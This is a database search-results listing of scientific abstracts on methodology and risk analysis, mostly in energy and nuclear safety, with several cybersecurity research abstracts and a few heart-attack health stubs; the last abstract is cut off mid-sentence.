    Energy Technology Data Exchange (ETDEWEB)

    A.D. Rao; G.S. Samuelsen; F.L. Robson; B. Washom; S.G. Berenyi

    2006-06-30

    Under the sponsorship of the U.S. Department of Energy/National Energy Technology Laboratory, a multi-disciplinary team led by the Advanced Power and Energy Program of the University of California at Irvine is defining the system engineering issues associated with the integration of key components and subsystems into advanced power plant systems with goals of achieving high efficiency and minimized environmental impact while using fossil fuels. These power plant concepts include 'Zero Emission' power plants and the 'FutureGen' H2 co-production facilities. The study is broken down into three phases. Phase 1 of this study consisted of utilizing advanced technologies that are expected to be available in the 'Vision 21' time frame such as mega scale fuel cell based hybrids. Phase 2 includes current state-of-the-art technologies and those expected to be deployed in the nearer term such as advanced gas turbines and high temperature membranes for separating gas species and advanced gasifier concepts. Phase 3 includes identification of gas turbine based cycles and engine configurations suitable to coal-based gasification applications and the conceptualization of the balance of plant technology, heat integration, and the bottoming cycle for analysis in a future study. Also included in Phase 3 is the task of acquiring/providing turbo-machinery in order to gather turbo-charger performance data that may be used to verify simulation models as well as establishing system design constraints. The results of these various investigations will serve as a guide for the U. S. Department of Energy in identifying the research areas and technologies that warrant further support.

  10. Risk analysis methodologies for the transportation of radioactive materials

    International Nuclear Information System (INIS)

    Geffen, C.A.

    1983-05-01

    Different methodologies have evolved for consideration of each of the many steps required in performing a transportation risk analysis. Although there are techniques that attempt to consider the entire scope of the analysis in depth, most applications of risk assessment to the transportation of nuclear fuel cycle materials develop specific methodologies for only one or two parts of the analysis. The remaining steps are simplified for the analyst by narrowing the scope of the effort (such as evaluating risks for only one material, or a particular set of accident scenarios, or movement over a specific route); performing a qualitative rather than a quantitative analysis (probabilities may be simply ranked as high, medium or low, for instance); or assuming some generic, conservative conditions for potential release fractions and consequences. This paper presents a discussion of the history and present state-of-the-art of transportation risk analysis methodologies. Many reports in this area were reviewed as background for this presentation. The literature review, while not exhaustive, did result in a complete representation of the major methods used today in transportation risk analysis. These methodologies primarily include the use of severity categories based on historical accident data, the analysis of specifically assumed accident sequences for the transportation activity of interest, and the use of fault or event tree analysis. Although the focus of this work has generally been on potential impacts to public groups, some effort has been expended in the estimation of risks to occupational groups in transportation activities

  11. HackAttack: Game-Theoretic Analysis of Realistic Cyber Conflicts

    Energy Technology Data Exchange (ETDEWEB)

    Ferragut, Erik M [ORNL; Brady, Andrew C [Jefferson Middle School, Oak Ridge, TN; Brady, Ethan J [Oak Ridge High School, Oak Ridge, TN; Ferragut, Jacob M [Oak Ridge High School, Oak Ridge, TN; Ferragut, Nathan M [Oak Ridge High School, Oak Ridge, TN; Wildgruber, Max C [ORNL

    2016-01-01

    Game theory is appropriate for studying cyber conflict because it allows for an intelligent and goal-driven adversary. Applications of game theory have led to a number of results regarding optimal attack and defense strategies. However, the overwhelming majority of applications explore overly simplistic games, often ones in which each participant s actions are visible to every other participant. These simplifications strip away the fundamental properties of real cyber conflicts: probabilistic alerting, hidden actions, unknown opponent capabilities. In this paper, we demonstrate that it is possible to analyze a more realistic game, one in which different resources have different weaknesses, players have different exploits, and moves occur in secrecy, but they can be detected. Certainly, more advanced and complex games are possible, but the game presented here is more realistic than any other game we know of in the scientific literature. While optimal strategies can be found for simpler games using calculus, case-by-case analysis, or, for stochastic games, Q-learning, our more complex game is more naturally analyzed using the same methods used to study other complex games, such as checkers and chess. We define a simple evaluation function and employ multi-step searches to create strategies. We show that such scenarios can be analyzed, and find that in cases of extreme uncertainty, it is often better to ignore one s opponent s possible moves. Furthermore, we show that a simple evaluation function in a complex game can lead to interesting and nuanced strategies.

  12. CONTENT ANALYSIS, DISCOURSE ANALYSIS, AND CONVERSATION ANALYSIS: PRELIMINARY STUDY ON CONCEPTUAL AND THEORETICAL METHODOLOGICAL DIFFERENCES

    Directory of Open Access Journals (Sweden)

    Anderson Tiago Peixoto Gonçalves

    2016-08-01

    Full Text Available This theoretical essay aims to reflect on three models of text interpretation used in qualitative research, which is often confused in its concepts and methodologies (Content Analysis, Discourse Analysis, and Conversation Analysis. After the presentation of the concepts, the essay proposes a preliminary discussion on conceptual and theoretical methodological differences perceived between them. A review of the literature was performed to support the conceptual and theoretical methodological discussion. It could be verified that the models have differences related to the type of strategy used in the treatment of texts, the type of approach, and the appropriate theoretical position.

  13. Development of a Long Term Cooling Analysis Methodology Using Rappel

    International Nuclear Information System (INIS)

    Lee, S. I.; Jeong, J. H.; Ban, C. H.; Oh, S. J.

    2012-01-01

    Since the revision of the 10CFR50.46 in 1988, which allowed BE (Best-Estimate) method in analyzing the safety performance of a nuclear power plant, safety analysis methodologies have been changed continuously from conservative EM (Evaluation Model) approaches to BE ones. In this context, LSC (Long-Term core Cooling) methodologies have been reviewed by the regulatory bodies of USA and Korea. Some non-conservatism and improperness of the old methodology have been identified, and as a result, USNRC suspended the approval of CENPD-254-P-A which is the old LSC methodology for CE-designed NPPs. Regulatory bodies requested to remove the non-conservatisms and to reflect system transient behaviors in all the LSC methodologies used. In the present study, a new LSC methodology using RELAP5 is developed. RELAP5 and a newly developed code, BACON (Boric Acid Concentration Of Nuclear power plant) are used to calculate the transient behavior of the system and the boric acid concentration, respectively. Full range of break spectrum is considered and the applicability is confirmed through plant demonstration calculations. The result shows a good comparison with the old-fashioned ones, therefore, the methodology could be applied with no significant changes of current LSC plans

  14. Complexity and Vulnerability Analysis of Critical Infrastructures: A Methodological Approach

    Directory of Open Access Journals (Sweden)

    Yongliang Deng

    2017-01-01

    Full Text Available Vulnerability analysis of network models has been widely adopted to explore the potential impacts of random disturbances, deliberate attacks, and natural disasters. However, almost all these models are based on a fixed topological structure, in which the physical properties of infrastructure components and their interrelationships are not well captured. In this paper, a new research framework is put forward to quantitatively explore and assess the complexity and vulnerability of critical infrastructure systems. Then, a case study is presented to prove the feasibility and validity of the proposed framework. After constructing metro physical network (MPN, Pajek is employed to analyze its corresponding topological properties, including degree, betweenness, average path length, network diameter, and clustering coefficient. With a comprehensive understanding of the complexity of MPN, it would be beneficial for metro system to restrain original near-miss or accidents and support decision-making in emergency situations. Moreover, through the analysis of two simulation protocols for system component failure, it is found that the MPN turned to be vulnerable under the condition that the high-degree nodes or high-betweenness edges are attacked. These findings will be conductive to offer recommendations and proposals for robust design, risk-based decision-making, and prioritization of risk reduction investment.

  15. Safety analysis and evaluation methodology for fusion systems

    International Nuclear Information System (INIS)

    Fujii-e, Y.; Kozawa, Y.; Namba, C.

    1987-03-01

    Fusion systems which are under development as future energy systems have reached a stage that the break even is expected to be realized in the near future. It is desirable to demonstrate that fusion systems are well acceptable to the societal environment. There are three crucial viewpoints to measure the acceptability, that is, technological feasibility, economy and safety. These three points have close interrelation. The safety problem is more important since three large scale tokamaks, JET, TFTR and JT-60, start experiment, and tritium will be introduced into some of them as the fusion fuel. It is desirable to establish a methodology to resolve the safety-related issues in harmony with the technological evolution. The promising fusion system toward reactors is not yet settled. This study has the objective to develop and adequate methodology which promotes the safety design of general fusion systems and to present a basis for proposing the R and D themes and establishing the data base. A framework of the methodology, the understanding and modeling of fusion systems, the principle of ensuring safety, the safety analysis based on the function and the application of the methodology are discussed. As the result of this study, the methodology for the safety analysis and evaluation of fusion systems was developed. New idea and approach were presented in the course of the methodology development. (Kako, I.)

  16. Incorporation of advanced accident analysis methodology into safety analysis reports

    International Nuclear Information System (INIS)

    2003-05-01

    as structural analysis codes and computational fluid dynamics codes (CFD) are applied. The initial code development took place in the sixties and seventies and resulted in a set of quite conservative codes for the reactor dynamics, thermal-hydraulics and containment analysis. The most important limitations of these codes came from insufficient knowledge of the physical phenomena and of the limited computer memory and speed. Very significant advances have been made in the development of the code systems during the last twenty years in all of the above areas. If the data for the physical models of the code are sufficiently well established and allow quite a realistic analysis, these newer versions are called advanced codes. The assumptions used in the deterministic safety analysis vary from very pessimistic to realistic assumptions. In the accident analysis terminology, it is customary to call the pessimistic assumptions 'conservative' and the realistic assumptions 'best estimate'. The assumptions can refer to the selection of physical models, the introduction of these models into the code, and the initial and boundary conditions including the performance and failures of the equipment and human action. The advanced methodology in the present report means application of advanced codes (or best estimate codes), which sometimes represent a combination of various advanced codes for separate stages of the analysis, and in some cases in combination with experiments. The Safety Analysis Reports are required to be available before and during the operation of the plant in most countries. The contents, scope and stages of the SAR vary among the countries. The guide applied in the USA, i.e. the Regulatory Guide 1.70 is representative for the way in which the SARs are made in many countries. During the design phase, a preliminary safety analysis report (PSAR) is requested in many countries and the final safety analysis report (FSAR) is required for the operating licence. There is

  17. Methodology for flood risk analysis for nuclear power plants

    International Nuclear Information System (INIS)

    Wagner, D.P.; Casada, M.L.; Fussell, J.B.

    1984-01-01

    The methodology for flood risk analysis described here addresses the effects of a flood on nuclear power plant safety systems. Combining the results of this method with the probability of a flood allows the effects of flooding to be included in a probabilistic risk assessment. The five-step methodology includes accident sequence screening to focus the detailed analysis efforts on the accident sequences that are significantly affected by a flood event. The quantitative results include the flood's contribution to system failure probability, accident sequence occurrence frequency and consequence category occurrence frequency. The analysis can be added to existing risk assessments without a significant loss in efficiency. The results of two example applications show the usefulness of the methodology. Both examples rely on the Reactor Safety Study for the required risk assessment inputs and present changes in the Reactor Safety Study results as a function of flood probability

  18. Heart Attack

    Science.gov (United States)

    ... properly causes your body's blood sugar levels to rise, increasing your risk of heart attack. Metabolic syndrome. This occurs when you have obesity, high blood pressure and high blood sugar. Having metabolic ...

  19. Heart Attack

    Science.gov (United States)

    ... family history of heart attack race – African Americans, Mexican Americans, Native Americans, and native Hawaiians are at ... Your doctor will prescribe the medicines that are right for you. If you have had a heart ...

  20. Simplified methodology for analysis of Angra-1 containing

    International Nuclear Information System (INIS)

    Neves Conti, T. das; Souza, A.L. de; Sabundjian, G.

    1988-01-01

    A simplified methodology of analysis was developed to simulate a Large Break Loss of Coolant Accident in the Angra 1 Nuclear Power Station. Using the RELAP5/MOD1, RELAP4/MOD5 and CONTEMPT-LT Codes, the time the variation of pressure and temperature in the containment was analysed. The obtained data was compared with the Angra 1 Final Safety Analysis Report, and too those calculated by a Detailed Model. The results obtained by this new methodology such as the small computational time of simulation, were satisfactory when getting the preliminar avaliation of the Angra 1 global parameters. (author) [pt

  1. Methodological developments and applications of neutron activation analysis

    International Nuclear Information System (INIS)

    Kucera, J.

    2007-01-01

    The paper reviews the author's experience acquired and achievements made in methodological developments of neutron activation analysis (NAA) of mostly biological materials. These involve epithermal neutron activation analysis, radiochemical neutron activation analysis using both single- and multi-element separation procedures, use of various counting modes, and the development and use of the self-verification principle. The role of NAA in the detection of analytical errors is discussed and examples of applications of the procedures developed are given. (author)

  2. PIXE methodology of rare earth element analysis and its applications

    International Nuclear Information System (INIS)

    Ma Xinpei

    1992-01-01

    The Proton Induced X-ray Emission (PIXE) methodology of rare earth element (REEs) analysis is discussed, including the significance of REE analysis, the principle of PIXE applied to REE, selection of characteristic X-ray for Lanthanide series elements, deconvolution of highly over lapped PIXE spectrum and minimum detection limit (MDL) of REEs. Some practical applications are presented. And the specialities of PIXE analysis to the high pure REE chemicals are discussed. (author)

  3. Development of seismic risk analysis methodologies at JAERI

    International Nuclear Information System (INIS)

    Tanaka, T.; Abe, K.; Ebisawa, K.; Oikawa, T.

    1988-01-01

    The usefulness of probabilistic safety assessment (PSA) is recognized worldwidely for balanced design and regulation of nuclear power plants. In Japan, the Japan Atomic Energy Research Institute (JAERI) has been engaged in developing methodologies necessary for carrying out PSA. The research and development program was started in 1980. In those days the effort was only for internal initiator PSA. In 1985 the program was expanded so as to include external event analysis. Although this expanded program is to cover various external initiators, the current effort is dedicated for seismic risk analysis. There are three levels of seismic PSA, similarly to internal initiator PSA: Level 1: Evaluation of core damage frequency, Level 2: Evaluation of radioactive release frequency and source terms, and Level 3: Evaluation of environmental consequence. In the JAERI's program, only the methodologies for level 1 seismic PSA are under development. The methodology development for seismic risk analysis is divided into two phases. The Phase I study is to establish a whole set of simple methodologies based on currently available data. In the Phase II, Sensitivity study will be carried out to identify the parameters whose uncertainty may result in lage uncertainty in seismic risk, and For such parameters, the methodology will be upgraded. Now the Phase I study has almost been completed. In this report, outlines of the study and some of its outcomes are described

  4. Security Analysis of 7-Round MISTY1 against Higher Order Differential Attacks

    Science.gov (United States)

    Tsunoo, Yukiyasu; Saito, Teruo; Shigeri, Maki; Kawabata, Takeshi

    MISTY1 is a 64-bit block cipher that has provable security against differential and linear cryptanalysis. MISTY1 is one of the algorithms selected in the European NESSIE project, and it has been recommended for Japanese e-Government ciphers by the CRYPTREC project. This paper shows that higher order differential attacks can be successful against 7-round versions of MISTY1 with FL functions. The attack on 7-round MISTY1 can recover a partial subkey with a data complexity of 254.1 and a computational complexity of 2120.8, which signifies the first successful attack on 7-round MISTY1 with no limitation such as a weak key. This paper also evaluates the complexity of this higher order differential attack on MISTY1 in which the key schedule is replaced by a pseudorandom function. It is shown that resistance to the higher order differential attack is not substantially improved even in 7-round MISTY1 in which the key schedule is replaced by a pseudorandom function.

  5. Proactive Routing Mutation Against Stealthy Distributed Denial of Service Attacks – Metrics, Modeling and Analysis

    Energy Technology Data Exchange (ETDEWEB)

    Duan, Qi; Al-Shaer, Ehab; Chatterjee, Samrat; Halappanavar, Mahantesh; Oehmen, Christopher S.

    2018-04-01

    The Infrastructure Distributed Denial of Service (IDDoS) attacks continue to be one of the most devastating challenges facing cyber systems. The new generation of IDDoS attacks exploit the inherent weakness of cyber infrastructure including deterministic nature of routes, skew distribution of flows, and Internet ossification to discover the network critical links and launch highly stealthy flooding attacks that are not observable at the victim end. In this paper, first, we propose a new metric to quantitatively measure the potential susceptibility of any arbitrary target server or domain to stealthy IDDoS attacks, and es- timate the impact of such susceptibility on enterprises. Second, we develop a proactive route mutation technique to minimize the susceptibility to these attacks by dynamically changing the flow paths periodically to invalidate the adversary knowledge about the network and avoid targeted critical links. Our proposed approach actively changes these network paths while satisfying security and qualify of service requirements. We present an integrated approach of proactive route mutation that combines both infrastructure-based mutation that is based on reconfiguration of switches and routers, and middle-box approach that uses an overlay of end-point proxies to construct a virtual network path free of critical links to reach a destination. We implemented the proactive path mutation technique on a Software Defined Network using the OpendDaylight controller to demonstrate a feasible deployment of this approach. Our evaluation validates the correctness, effectiveness, and scalability of the proposed approaches.

  6. A Global Sensitivity Analysis Methodology for Multi-physics Applications

    Energy Technology Data Exchange (ETDEWEB)

    Tong, C H; Graziani, F R

    2007-02-02

    Experiments are conducted to draw inferences about an entire ensemble based on a selected number of observations. This applies to both physical experiments as well as computer experiments, the latter of which are performed by running the simulation models at different input configurations and analyzing the output responses. Computer experiments are instrumental in enabling model analyses such as uncertainty quantification and sensitivity analysis. This report focuses on a global sensitivity analysis methodology that relies on a divide-and-conquer strategy and uses intelligent computer experiments. The objective is to assess qualitatively and/or quantitatively how the variabilities of simulation output responses can be accounted for by input variabilities. We address global sensitivity analysis in three aspects: methodology, sampling/analysis strategies, and an implementation framework. The methodology consists of three major steps: (1) construct credible input ranges; (2) perform a parameter screening study; and (3) perform a quantitative sensitivity analysis on a reduced set of parameters. Once identified, research effort should be directed to the most sensitive parameters to reduce their uncertainty bounds. This process is repeated with tightened uncertainty bounds for the sensitive parameters until the output uncertainties become acceptable. To accommodate the needs of multi-physics application, this methodology should be recursively applied to individual physics modules. The methodology is also distinguished by an efficient technique for computing parameter interactions. Details for each step will be given using simple examples. Numerical results on large scale multi-physics applications will be available in another report. Computational techniques targeted for this methodology have been implemented in a software package called PSUADE.

  7. Experiment Analysis of Concrete’s Mechanical Property Deterioration Suffered Sulfate Attack and Drying-Wetting Cycles

    Directory of Open Access Journals (Sweden)

    Wei Tian

    2017-01-01

    Full Text Available The mechanism of concrete deterioration in sodium sulfate solution is investigated. The macroperformance was characterized via its apparent properties, mass loss, and compressive strength. Changes in ions in the solution at different sulfate attack periods were tested by inductively coupled plasma (ICP. The damage evolution law, as well as analysis of the concrete’s meso- and microstructure, was revealed by scanning electron microscope (SEM and computed tomography (CT scanning equipment. The results show that the characteristics of concrete differed at each sulfate attack period; the drying-wetting cycles generally accelerated the deterioration process of concrete. In the early sulfate attack period, the pore structure of the concrete was filled with sulfate attack products (e.g., ettringite and gypsum, and its mass and strength increased. The pore size and porosity decreased while the CT number increased. As deterioration progressed, the swelling/expansion force of products and the salt crystallization pressure of sulfate crystals acted on the inner wall of the concrete to accumulate damage and accelerate deterioration. The mass and strength of concrete sharply decreased. The number and volume of pores increased, and the pore grew more quickly resulting in initiation and expansion of microcracks while the CT number decreased.

  8. Taipower's transient analysis methodology for pressurized water reactors

    International Nuclear Information System (INIS)

    Huang, Pinghue

    1998-01-01

    The methodology presented in this paper is a part of the 'Taipower's Reload Design and Transient Analysis Methodologies for Light Water Reactors' developed by the Taiwan Power Company (TPC) and the Institute of Nuclear Energy Research. This methodology utilizes four computer codes developed or sponsored by Electric Power Research institute: system transient analysis code RETRAN-02, core thermal-hydraulic analysis code COBRAIIIC, three-dimensional spatial kinetics code ARROTTA, and fuel rod evaluation code FREY. Each of the computer codes was extensively validated. Analysis methods and modeling techniques were conservatively established for each application using a systematic evaluation with the assistance of sensitivity studies. The qualification results and analysis methods were documented in detail in TPC topical reports. The topical reports for COBRAIIIC, ARROTTA. and FREY have been reviewed and approved by the Atomic Energy Council (ABC). TPC 's in-house transient methodology have been successfully applied to provide valuable support for many operational issues and plant improvements for TPC's Maanshan Units I and 2. Major applications include the removal of the resistance temperature detector bypass system, the relaxation of the hot-full-power moderator temperature coefficient design criteria imposed by the ROCAEC due to a concern on Anticipated Transient Without Scram, the reduction of boron injection tank concentration and the elimination of the heat tracing, and the reduction of' reactor coolant system flow. (author)

  9. A methodology to incorporate organizational factors into human reliability analysis

    International Nuclear Information System (INIS)

    Li Pengcheng; Chen Guohua; Zhang Li; Xiao Dongsheng

    2010-01-01

    A new holistic methodology for Human Reliability Analysis (HRA) is proposed to model the effects of the organizational factors on the human reliability. Firstly, a conceptual framework is built, which is used to analyze the causal relationships between the organizational factors and human reliability. Then, the inference model for Human Reliability Analysis is built by combining the conceptual framework with Bayesian networks, which is used to execute the causal inference and diagnostic inference of human reliability. Finally, a case example is presented to demonstrate the specific application of the proposed methodology. The results show that the proposed methodology of combining the conceptual model with Bayesian Networks can not only easily model the causal relationship between organizational factors and human reliability, but in a given context, people can quantitatively measure the human operational reliability, and identify the most likely root causes or the prioritization of root causes caused human error. (authors)

  10. A methodology for radiological accidents analysis in industrial gamma radiography

    International Nuclear Information System (INIS)

    Silva, F.C.A. da.

    1990-01-01

    A critical review of 34 published severe radiological accidents in industrial gamma radiography, that happened in 15 countries, from 1960 to 1988, was performed. The most frequent causes, consequences and dose estimation methods were analysed, aiming to stablish better procedures of radiation safety and accidents analysis. The objective of this work is to elaborate a radiological accidents analysis methodology in industrial gamma radiography. The suggested methodology will enable professionals to determine the true causes of the event and to estimate the dose with a good certainty. The technical analytical tree, recommended by International Atomic Energy Agency to perform radiation protection and nuclear safety programs, was adopted in the elaboration of the suggested methodology. The viability of the use of the Electron Gamma Shower 4 Computer Code System to calculate the absorbed dose in radiological accidents in industrial gamma radiography, mainly at sup(192)Ir radioactive source handling situations was also studied. (author)

  11. Disposal criticality analysis methodology's principal isotope burnup credit

    International Nuclear Information System (INIS)

    Doering, T.W.; Thomas, D.A.

    2001-01-01

    This paper presents the burnup credit aspects of the United States Department of Energy Yucca Mountain Project's methodology for performing criticality analyses for commercial light-water-reactor fuel. The disposal burnup credit methodology uses a 'principal isotope' model, which takes credit for the reduced reactivity associated with the build-up of the primary principal actinides and fission products in irradiated fuel. Burnup credit is important to the disposal criticality analysis methodology and to the design of commercial fuel waste packages. The burnup credit methodology developed for disposal of irradiated commercial nuclear fuel can also be applied to storage and transportation of irradiated commercial nuclear fuel. For all applications a series of loading curves are developed using a best estimate methodology and depending on the application, an additional administrative safety margin may be applied. The burnup credit methodology better represents the 'true' reactivity of the irradiated fuel configuration, and hence the real safety margin, than do evaluations using the 'fresh fuel' assumption. (author)

  12. Large-Scale Analysis of Remote Code Injection Attacks in Android Apps

    Directory of Open Access Journals (Sweden)

    Hyunwoo Choi

    2018-01-01

    Full Text Available It is pretty well known that insecure code updating procedures for Android allow remote code injection attack. However, other than codes, there are many resources in Android that have to be updated, such as temporary files, images, databases, and configurations (XML and JSON. Security of update procedures for these resources is largely unknown. This paper investigates general conditions for remote code injection attacks on these resources. Using this, we design and implement a static detection tool that automatically identifies apps that meet these conditions. We apply the detection tool to a large dataset comprising 9,054 apps, from three different types of datasets: official market, third-party market, and preinstalled apps. As a result, 97 apps were found to be potentially vulnerable, with 53 confirmed as vulnerable to remote code injection attacks.

  13. Failure Analysis of End Grain Attack and Pit Corrosion in 316L Stainless Steel Pipe

    Energy Technology Data Exchange (ETDEWEB)

    Baek, Un Bong; Nam, Sung Hoon [Korea Research Institute of Standards and Science, Daejeon (Korea, Republic of); Choe, Byung Hak; Shim, Jong Hun [Gangneung-Wonju National University, Gangneung (Korea, Republic of); Lee, Jin Hee [Oil and Gas Technology SK E and C, Junggu (Korea, Republic of); Kim, Eui Soo [National Forensic Service, Wonju (Korea, Republic of)

    2015-01-15

    The aim of this paper was to analyze the cause of surface cracks and pit corrosion on 316L pipe. An End Grain Attack (EGA) as a kind of pit mechanism was conducted on the pipe surface. The early stage of the EGA may come from under-deposit of caustic-water formation compositions like Na+, K+, Ca+, and Mg+ etc. The under-deposit corrosion is caused by the corrosion layer on the pipe surface followed by crevice corrosion due to accumulation of Cl‒ or S‒ composition between the corrosion layer and the pipe surface. In the early stage, the EGA occurred in all grain boundaries beneath the under-deposit corrosion. In the later stage of EGA, almost all the early attacked grain boundaries stopped at a limited depth of about 10 µm. Meanwhile, only the smallest number of the attacked boundaries progressed into the pipe as pit corrosion and resulted in leak failure.

  14. Extended analysis of the Trojan-horse attack in quantum key distribution

    Science.gov (United States)

    Vinay, Scott E.; Kok, Pieter

    2018-04-01

    The discrete-variable quantum key distribution protocols based on the 1984 protocol of Bennett and Brassard (BB84) are known to be secure against an eavesdropper, Eve, intercepting the flying qubits and performing any quantum operation on them. However, these protocols may still be vulnerable to side-channel attacks. We investigate the Trojan-horse side-channel attack where Eve sends her own state into Alice's apparatus and measures the reflected state to estimate the key. We prove that the separable coherent state is optimal for Eve among the class of multimode Gaussian attack states, even in the presence of thermal noise. We then provide a bound on the secret key rate in the case where Eve may use any separable state.

  15. Cyber-Attacks on Smart Meters in Household Nanogrid: Modeling, Simulation and Analysis

    OpenAIRE

    Tellbach, Denise; Li, Yan-Fu

    2018-01-01

    The subject of cyber-security and therefore cyber-attacks on smart grid (SG) has become subject of many publications in the last years, emphasizing its importance in research, as well as in practice. One especially vulnerable part of SG are smart meters (SMs). The major contribution of simulating a variety of cyber-attacks on SMs that have not been done in previous studies is the identification and quantification of the possible impacts on the security of SG. In this study, a simulation model...

  16. Modeling attacking of high skills volleyball players

    Directory of Open Access Journals (Sweden)

    Vladimir Gamaliy

    2014-12-01

    Full Text Available Purpose: to determine the model indicators of technical and tactical actions in the attack highly skilled volleyball players. Material and Methods: the study used statistical data of major international competitions: Olympic Games – 2012 World Championships – 2010, World League – 2010–2014 European Championship – 2010–2014. A total of 130 analyzed games. Methods were used: analysis and generalization of scientific and methodological literature, analysis of competitive activity highly skilled volleyball players, teacher observation, modeling technical and tactical actions in attacking highly skilled volleyball players. Results: it was found that the largest volume application of technical and tactical actions in the attack belongs to the group tactics «supple movement», whose indicator is 21,3%. The smallest amount of application belongs to the group tactics «flight level» model whose indicators is 5,4%, the efficiency of 3,4%, respectively. It is found that the power service in the jump from model parameters used in 51,6% of cases, the planning targets – 21,7% and 4,4% planning to reduce. Attacks performed with the back line, on model parameters used in the amount of 20,8% efficiency –13,7%. Conclusions: we prove that the performance of technical and tactical actions in the attack can be used as model in the control system of training and competitive process highly skilled volleyball players

  17. Evaluation of a Multi-Agent System for Simulation and Analysis of Distributed Denial-of-Service Attacks

    National Research Council Canada - National Science Library

    Huu, Tee

    2003-01-01

    DDoS attack is evolving at a rapid and alarming rate; an effective solution must be formulated using an adaptive approach Most of the simulations are performed at the attack phase of the DDoS attack...

  18. Moments of Goodness: An Analysis of Ethical and Educational Dimensions of the Terror Attack on Utøya, Norway (July 22, 2011)

    Science.gov (United States)

    Kristiansen, Aslaug

    2015-01-01

    The analysis is based on some moral experiences taking place during a terrorist attack on the Norwegian Labor Party's youth camp on the island of Utøya (outside of Oslo) July 22, 2011, where 69 young people were killed and several seriously injured. After the attack many of the survivors told stories of how strangers spontaneous had helped and…

  19. A Local Approach Methodology for the Analysis of Ultimate Strength ...

    African Journals Online (AJOL)

    The local approach methodology in contrast to classical fracture mechanics can be used to predict the onset of tearing fracture, and the effects of geometry in tubular joints. Finite element analysis of T-joints plate geometries, and tubular joints has been done. The parameters of constraint, equivalent stress, plastic strain and ...

  20. Methodology for reactor core physics analysis - part 2

    International Nuclear Information System (INIS)

    Ponzoni Filho, P.; Fernandes, V.B.; Lima Bezerra, J. de; Santos, T.I.C.

    1992-12-01

    The computer codes used for reactor core physics analysis are described. The modifications introduced in the public codes and the technical basis for the codes developed by the FURNAS utility are justified. An evaluation of the impact of these modifications on the parameter involved in qualifying the methodology is included. (F.E.). 5 ref, 7 figs, 5 tabs

  1. Human Schedule Performance, Protocol Analysis, and the "Silent Dog" Methodology

    Science.gov (United States)

    Cabello, Francisco; Luciano, Carmen; Gomez, Inmaculada; Barnes-Holmes, Dermot

    2004-01-01

    The purpose of the current experiment was to investigate the role of private verbal behavior on the operant performances of human adults, using a protocol analysis procedure with additional methodological controls (the "silent dog" method). Twelve subjects were exposed to fixed ratio 8 and differential reinforcement of low rate 3-s schedules. For…

  2. Lone Actor Terrorist Attack Planning and Preparation: A Data-Driven Analysis.

    Science.gov (United States)

    Schuurman, Bart; Bakker, Edwin; Gill, Paul; Bouhana, Noémie

    2017-10-23

    This article provides an in-depth assessment of lone actor terrorists' attack planning and preparation. A codebook of 198 variables related to different aspects of pre-attack behavior is applied to a sample of 55 lone actor terrorists. Data were drawn from open-source materials and complemented where possible with primary sources. Most lone actors are not highly lethal or surreptitious attackers. They are generally poor at maintaining operational security, leak their motivations and capabilities in numerous ways, and generally do so months and even years before an attack. Moreover, the "loneness" thought to define this type of terrorism is generally absent; most lone actors uphold social ties that are crucial to their adoption and maintenance of the motivation and capability to commit terrorist violence. The results offer concrete input for those working to detect and prevent this form of terrorism and argue for a re-evaluation of the "lone actor" concept. © 2017 The Authors. Journal of Forensic Sciences published by Wiley Periodicals, Inc. on behalf of American Academy of Forensic Sciences.

  3. Interactive analysis of SDN-driven defence against Distributed Denial of Service attacks

    NARCIS (Netherlands)

    Koning, R.; de Graaff, B.; de Laat, C.; Meijer, R.; Grosso, P.

    2016-01-01

    The Secure Autonomous Response Networks (SARNET) framework introduces a mechanism to respond autonomously to security attacks in Software Defined Networks (SDN). Still the range of responses possible and their effectiveness need to be properly evaluated such that the decision making process and the

  4. Quantifying Improbability: An Analysis of the Lloyd’s of London Business Blackout Cyber Attack Scenario

    Science.gov (United States)

    Scenarios that describe cyber attacks on the electric grid consistently predict significant disruptions to the economy and citizens quality of life...phenomena that deserve further investigation, such as the importance of some individual power plants in influencing the adversarys probability of

  5. PROBLEMS AND METHODOLOGY OF THE PETROLOGIC ANALYSIS OF COAL FACIES.

    Science.gov (United States)

    Chao, Edward C.T.

    1983-01-01

    This condensed synthesis gives a broad outline of the methodology of coal facies analysis, procedures for constructing sedimentation and geochemical formation curves, and micro- and macrostratigraphic analysis. The hypothetical coal bed profile has a 3-fold cycle of material characteristics. Based on studies of other similar profiles of the same coal bed, and on field studies of the sedimentary rock types and their facies interpretation, one can assume that the 3-fold subdivision is of regional significance.

  6. Disposal criticality analysis methodology for fissile waste forms

    International Nuclear Information System (INIS)

    Davis, J.W.; Gottlieb, P.

    1998-03-01

    A general methodology has been developed to evaluate the criticality potential of the wide range of waste forms planned for geologic disposal. The range of waste forms include commercial spent fuel, high level waste, DOE spent fuel (including highly enriched), MOX using weapons grade plutonium, and immobilized plutonium. The disposal of these waste forms will be in a container with sufficiently thick corrosion resistant barriers to prevent water penetration for up to 10,000 years. The criticality control for DOE spent fuel is primarily provided by neutron absorber material incorporated into the basket holding the individual assemblies. For the immobilized plutonium, the neutron absorber material is incorporated into the waste form itself. The disposal criticality analysis methodology includes the analysis of geochemical and physical processes that can breach the waste package and affect the waste forms within. The basic purpose of the methodology is to guide the criticality control features of the waste package design, and to demonstrate that the final design meets the criticality control licensing requirements. The methodology can also be extended to the analysis of criticality consequences (primarily increased radionuclide inventory), which will support the total performance assessment for the respository

  7. Two methodologies for optical analysis of contaminated engine lubricants

    International Nuclear Information System (INIS)

    Aghayan, Hamid; Yang, Jun; Bordatchev, Evgueni

    2012-01-01

    The performance, efficiency and lifetime of modern combustion engines significantly depend on the quality of the engine lubricants. However, contaminants, such as gasoline, moisture, coolant and wear particles, reduce the life of engine mechanical components and lubricant quality. Therefore, direct and indirect measurements of engine lubricant properties, such as physical-mechanical, electro-magnetic, chemical and optical properties, are intensively utilized in engine condition monitoring systems and sensors developed within the last decade. Such sensors for the measurement of engine lubricant properties can be used to detect a functional limit of the in-use lubricant, increase drain interval and reduce the environmental impact. This paper proposes two new methodologies for the quantitative and qualitative analysis of the presence of contaminants in the engine lubricants. The methodologies are based on optical analysis of the distortion effect when an object image is obtained through a thin random optical medium (e.g. engine lubricant). The novelty of the proposed methodologies is in the introduction of an object with a known periodic shape behind a thin film of the contaminated lubricant. In this case, an acquired image represents a combined lubricant–object optical appearance, where an a priori known periodic structure of the object is distorted by a contaminated lubricant. In the object shape-based optical analysis, several parameters of an acquired optical image, such as the gray scale intensity of lubricant and object, shape width at object and lubricant levels, object relative intensity and width non-uniformity coefficient are newly proposed. Variations in the contaminant concentration and use of different contaminants lead to the changes of these parameters measured on-line. In the statistical optical analysis methodology, statistical auto- and cross-characteristics (e.g. auto- and 